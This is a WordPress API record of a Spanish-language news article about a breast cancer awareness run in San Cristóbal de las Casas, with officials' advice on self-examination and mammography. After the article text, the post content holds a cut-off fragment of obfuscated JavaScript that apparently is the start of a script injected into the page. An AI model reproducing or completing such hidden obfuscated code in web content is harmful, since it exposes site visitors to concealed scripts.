{"id":18583,"date":"2024-10-28T03:57:30","date_gmt":"2024-10-28T03:57:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18583"},"modified":"2024-10-28T03:57:31","modified_gmt":"2024-10-28T03:57:31","slug":"conmemoran-el-dia-internacional-de-lucha-contra-el-cancer-de-mama-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18583","title":{"rendered":"Conmemoran el D\u00eda Internacional de Lucha contra el C\u00e1ncer de Mama en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"480\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241027-WA1222.jpg\" alt=\"\" class=\"wp-image-18584\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241027-WA1222.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241027-WA1222-300x200.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>28 de octubre del 2024. San Crist\u00f3bal de las Casas.- En el marco de la conmemoraci\u00f3n del D\u00eda Internacional de Lucha contra el C\u00e1ncer de Mama, se realiz\u00f3 la carrera con causa &#8220;Corre con el coraz\u00f3n, vuela por la esperanza\u201d. El evento, organizado por el Sistema DIF municipal, busc\u00f3 fomentar la conciencia sobre la importancia de la detecci\u00f3n temprana y el apoyo a quienes enfrentan esta enfermedad.<\/p>\n\n\n\n<p>Durante el arranque de la carrera, Ricci Diestel expres\u00f3 que es un gran honor estar en esta carrera de coraz\u00f3n, por todas esas guerreras que est\u00e1n luchando d\u00eda con d\u00eda y por las mujeres que se adelantaron. &#8220;Es importante amarnos a nosotras mismas y qu\u00e9 mejor que con el amor de nuestra familia para salir adelante. Es momento de decirle a todas las mujeres: T\u00f3cate para que no te toque\u201d.<\/p>\n\n\n\n<p>El evento no solo reuni\u00f3 a ciudadanos, sino tambi\u00e9n a mujeres que han sobrevivido al c\u00e1ncer de mama y que, a trav\u00e9s de sus testimonios, inspiraron a m\u00e1s personas a tomar acci\u00f3n contra esta enfermedad. La presidenta honoraria del DIF, Guadalupe Diestel Alfaro, destac\u00f3 la relevancia de esta actividad, afirmando que su prop\u00f3sito principal es concientizar a la poblaci\u00f3n sobre la necesidad de un diagn\u00f3stico temprano y un tratamiento adecuado para prevenir el desarrollo del c\u00e1ncer de mama.<\/p>\n\n\n\n<p>Asimismo, Diestel Alfaro subray\u00f3 la importancia de la autoexploraci\u00f3n mensual a partir de los 20 a\u00f1os, el examen cl\u00ednico anual desde los 25 y la mastograf\u00eda a partir de los 40, medidas que seg\u00fan expertos pueden marcar la diferencia en la prevenci\u00f3n y detecci\u00f3n temprana de esta enfermedad. Esta carrera se suma a las actividades de sensibilizaci\u00f3n y prevenci\u00f3n impulsadas por el Sistema DIF en los \u00faltimos d\u00edas, reafirmando el compromiso de San Crist\u00f3bal en la lucha contra el c\u00e1ncer de mama.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 28 de octubre del 2024. San Crist\u00f3bal de las Casas.- En el marco de la conmemoraci\u00f3n del D\u00eda Internacional de Lucha contra el C\u00e1ncer de Mama, se realiz\u00f3 la carrera con causa &#8220;Corre con el coraz\u00f3n, vuela por la esperanza\u201d. El evento, organizado por el Sistema DIF municipal, busc\u00f3 fomentar la conciencia &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18584,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18583","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18583","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18583"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18583\/revisions"}],"predecessor-version":[{"id":18585,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18583\/revisions\/18585"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18584"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18583"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18583"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18583"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}